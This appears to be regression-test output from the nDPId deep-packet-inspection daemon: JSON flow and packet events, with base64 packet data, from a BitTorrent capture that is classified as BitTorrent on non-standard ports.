00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971321,"pkt":"LFbcjDU0xCwDBkn+CABFAAB48HJAAEAGAADAqAEDxmSSCc6n6wMx0mzN3F5zZYAYZooahAAAAQEIChnb\/+QB8nE1E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjuG56+SlFtqa9S4="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971321,"flow_last_seen":1455469971321,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971321,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1455469971481,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1455469971481,"pkt":"xCwDBkn+LFbcjDU0CABFAACcFzZAAHYG0wzGZJIJwKgBA+sDzqfcXnNlMdJtEYAYAQK5ewAAAQEICgHycUYZ2\/\/kE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopccBVvnEHfGIYQAAADnFABkMTplaTBlNDppcHY0NDrGZJIJMTI6Y29tcGxldGU="}
01316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1455469971641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":601,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":601,"pkt_l4_len":567,"thread_ts_msec":1455469971641,"pkt":"xCwDBkn+LFbcjDU0CABFAAJLGqBAAHYGzfPGZJIJwKgBA+sDzqfcXnPNMdJtEYAYAQJeTwAAAQEICgHycVYZ3ACEX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNjAxNjNlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTAzZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/f9\/\/\/\/37\/\/7\/\/\/\/\/\/\/3r\/\/\/\/3+\/\/7\/\/\/\/3\/\/9\/\/\/\/\/\/\/\/\/\/\/37\/7\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/9\/\/\/gAAAAAUEAAAClAAAAAUEAAAAnQAAAAUEAAAAVwAAAAUEAAACuQAAAAUEAAAAUAAAAAUEAAAA8gAAAAUEAAAB4QAAAAUEAAADfAAAAAUEAAABUwAAAAUEAAAAKgAAAAUEAAAANAAAAAUEAAABXwAAAAUEAAAAaQAAAAUEAAAAmAAAAAUEAAACfAAAAAUEAAADWQAAAAUEAAABTAAAAAUEAAABBgAAAAUEAAABegAAAAUEAAAA1QAAAAUEAAAAxQAAAAUEAAAAvAAAAAUEAAAAnwAAAAUEAAAC6Q=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469971675,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4IXFAAEAGAADAqAEDvmfDOM6mtimT1S+nN0acgIAY\/\/9DtgAAAQEIChncAUQAv2TsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkGjzZtimXS5YKE="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469971675,"flow_last_seen":1455469971675,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469971675,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1455469972136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469972136,"pkt":"xCwDBkn+LFbcjDU0CABFAACrWLRAAHIGbE2+Z8M4wKgBA7YpzqY3RpyAk9Uv64AYAQLhNwAAAQEICgC\/ZvwZ3AFEE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLUJUNzk1MC3xopUl3euuGS1IpvoAAAEBFABkMTplaTBlNDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzE="}
00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1455469973108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1455469973108,"pkt":"LFbcjDU0xCwDBkn+CABFAADJDUpAAEAGAADAqAEDvmfDOM6mtimT1TBDN0ac94AZ\/\/9EBwAAAQEIChncBtUAv2b8M2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxOnBpNDA5NTllNDpyZXFxaTI1NWUxOnYxOTrCtVRvcnJlbnQgTWFjIDEuOC42Njp5b3VyaXA0Or5nwzhlAAAAAQ8="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974358,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DCdAAEAGAADAqAEDUjrYc86rlaExvR02+FTOIoAY\/\/\/swwAAAQEIChncC64AhEXwE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjk6UZQGZj8psqfs="}
00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974358,"flow_last_seen":1455469974358,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974358,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469974533,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WuVAAEAGAADAqAEDUjlhU86qz5GeFCpM34MiOYAY0pJ1ogAAAQEIChncDF0AFHySE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjjDhVI8cWXj55ew="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469974533,"flow_last_seen":1455469974533,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469974533,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1455469974879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469974879,"pkt":"xCwDBkn+LFbcjDU0CABFAACrC6JAAHcGgnNSOWFTwKgBA8+RzqrfgyI5nhQqkIAYAQJ8JwAAAQEICgAUfLUZ3AxdE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wosdxOntFzioIvnoAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTBlMTptZDExOnU="}
01301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1455469974888,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469974888,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8C6RAAHcGgOBSOWFTwKgBA8+RzqrfgyKwnhQqkIAZAQKTPAAAAQEICgAUfLYZ3AxdcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNTMxMzdlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTA2ZTY6eW91cmlwNDpSN80BZQAAAHQF\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/+\/\/\/\/\/\/\/\/\/r\/\/\/\/\/\/\/\/\/\/9\/\/P\/v\/\/\/\/\/+\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/ff\/\/\/3\/f\/\/\/\/\/\/\/\/\/\/7\/\/\/\/+\/\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/t\/u\/\/\/\/\/\/\/\/\/gAAAAAUEAAABGAAAAAUEAAACxAAAAAUEAAAAmwAAAAUEAAAB\/wAAAAUEAAABMwAAAAUEAAABJgAAAAUEAAABZAAAAAUEAAACOgAAAAUEAAAA1QAAAAUEAAACEAAAAAUEAAACFgAAAAUEAAADTAAAAAUEAAABWwAAAAUEAAACMAAAAAUEAAADPQAAAAUEAAADSQAAAAUEAAACnwAAAAUEAAAAeQAAAAUEAAAABgAAAAUEAAAA0wAAAAUEAAABJwAAAAUEAAACfwAAAAUEAAADVQAAAAUEAAADWQ=="}
01456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1455469975129,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":705,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":705,"pkt_l4_len":671,"thread_ts_msec":1455469975129,"pkt":"xCwDBkn+LFbcjDU0CABFAAKzM7RAAHUG4zdSOthzwKgBA5Whzqv4VM4iMb0deoAY\/SAeWQAAAQEICgCERjQZ3AuuE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3woo6KDyQqidsX6OsAAADnFABkMTplaTBlNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MDdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/e\/\/\/\/\/9\/\/\/\/\/v\/\/2\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/7\/f\/+\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/7\/\/\/\/7+\/+\/\/\/+\/\/\/\/\/v\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/8\/\/\/\/\/\/\/f\/\/\/\/3\/\/\/\/\/\/\/\/+AAAAABQQAAAI1AAAABQQAAAEuAAAABQQAAABqAAAABQQAAAE\/AAAABQQAAABtAAAABQQAAAKkAAAABQQAAAElAAAABQQAAAL5AAAABQQAAANYAAAABQQAAAA2AAAABQQAAAIPAAAABQQAAAJBAAAABQQAAAAOAAAABQQAAAMMAAAABQQAAAJ5AAAABQQAAAF6AAAABQQAAAJZAAAABQQAAAATAAAABQQAAAM4AAAABQQAAAItAAAABQQAAAHdAAAABQQAAAEPAAAABQQAAAMNAAAABQQAAABX"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975234,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4WJNAAEAGAADAqAEDlxpfHs6vWJEERbWJ8qKonIAYJJ+4TgAAAQEIChncDxURKgrLE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjhul1XASmRgFxRA="}
00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975234,"flow_last_seen":1455469975234,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975234,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975240,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4VgZAAEAGAADAqAEDl0j\/o86w6hjbuZSz\/XvqFoAYKEhZAgAAAQEIChncDxoAaM\/9E0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpHIptJ+s3GSLpo="}
00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975240,"flow_last_seen":1455469975240,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975240,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469975265,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4dKFAAEAGAADAqAEDTzXkAs6tOSO1PcfcBOlxsoAYN4r1TQAAAQEIChncDzIAAH\/nE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjpuHBUmeY0dBAis="}
00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469975265,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}}
00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1455469975295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1455469975295,"pkt":"xCwDBkn+LFbcjDU0CABFAACPKABAAHIGh9GXSP+jwKgBA+oYzrD9e+oW27mU94AYAQF3EQAAAQEICgBo0AMZ3A8aE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wopW+kcQUcjSA5QoAAADnFABkMTplaTBlNDppcHY0NDqXSA=="}
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1455469975314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1455469975314,"pkt":"xCwDBkn+LFbcjDU0CABFAACdCeVAAHIGRpKXGl8ewKgBA1iRzq\/yoqicBEW1zYAYHVwArAAAAQEIChEqCxYZ3A8VE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC2coV7lk33H8ZRraqcAAADnFABkMTplaTBlNDppcHY0NDqXGl8eMTI6Y29tcGxldGVf"}
00991{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1455469975341,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":449,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":449,"pkt_l4_len":415,"thread_ts_msec":1455469975341,"pkt":"LFbcjDU0xCwDBkn+CABFAAGz+chAAEAGAADAqAEDUjrYc86rlaExvR16+FTQoYAY\/\/\/t\/gAAAQEIChncD3wAhEZHAAAA+hQAZDE6ZWkwZTQ6aXB2NDQ6UjfNATQ6aXB2NjE2Ov6AAAAAAAAAxiwD\/\/4GSf4xMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTI6dXRfcmVjb21tZW5kaTVlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0MDk1OWU0OnJlcXFpMjU1ZTE6djE5OsK1VG9ycmVudCBNYWMgMS44LjY2OnlvdXJpcDQ6UjrYc2UAAAABDwAAAAMJn\/8AAAADFAMAAAAAAQIAAABlFAZkODptc2dfdHlwZWkwZTM6bnVtaTIwZTY6ZmlsdGVyNjQ6AAAAAAAAAAAAAAAAAAAAAAAA